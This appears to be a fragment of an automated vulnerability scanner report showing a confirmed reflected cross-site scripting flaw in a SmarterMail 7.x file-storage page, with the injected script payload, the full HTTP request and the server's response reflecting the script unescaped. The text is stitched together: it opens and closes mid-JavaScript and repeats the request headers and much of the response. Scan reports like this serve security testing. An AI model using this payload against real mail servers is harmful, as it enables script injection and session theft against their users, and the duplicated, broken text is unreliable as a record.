var actionClass = "";
switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}
if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
|
- /Main/frmStoredFiles.aspx
/Main/frmStoredFiles.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| path | GET | '"--><script>alert(0x006503)</script> |
| __EVENTTARGET | POST | 3 |
| __EVENTARGUMENT | POST | 3 |
| __VIEWSTATE | POST | /wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo= |
Request
POST /Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Enetsparker(0x006503)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 406
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3d
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 406
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3d
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 04:38:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6368
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x006503)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x006503)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA2NTAzKTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZOrUdUYKQfM6P4uJS4QqZzGe661a" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x006503)</script>
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="11576fa62afd486b954916b36afda96e" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'"--><script>netsparker(0x006503)</script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">
<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>
<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>
</div>
</div>
<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">
</ul>
</div>
</div>
</div>
</div>
</div>
<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">
</div>
<div class="FooterSummary">
</div>
</div>
<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>
<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}
function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}
function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;
if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }
__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>
<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";
var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';
document.AdditionalResizeEvent = resizePage;
var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}
var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');
if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}
uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=11576fa62afd486b954916b36afda96e&pathField='%22--%3e%3cscript%3enetsparker(0x006503)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});
uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});
uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});
uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});
uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});
uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});
uploader.bind('UploadProgress', function(up, file) {
isBusy = true;
updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});
uploader.bind('StateChanged', function() {
updateList(false);
});
uploader.init();
};
function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";
$.each(uploader.files, function(i, file) {
inputHTML = '';
if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;
var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);
if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});
fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);
fileList[0].scrollTop = 0;
if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();
if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}
return retVal;
}
function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;
if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;
var actionClass = "";
switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}
if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 04:38:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6368
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x006503)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x006503)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA2NTAzKTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZOrUdUYKQfM6P4uJS4QqZzGe661a" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x006503)</script>
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="11576fa62afd486b954916b36afda96e" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'"--><script>netsparker(0x006503)</script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">
<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>
<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>
</div>
</div>
<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">
</ul>
</div>
</div>
</div>
</div>
</div>
<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">
</div>
<div class="FooterSummary">
</div>
</div>
<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>
<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}
function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}
function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;
if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }
__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>
<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";
var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';
document.AdditionalResizeEvent = resizePage;
var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}
var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');
if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}
uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=11576fa62afd486b954916b36afda96e&pathField='%22--%3e%3cscript%3enetsparker(0x006503)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});
uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});
uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});
uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
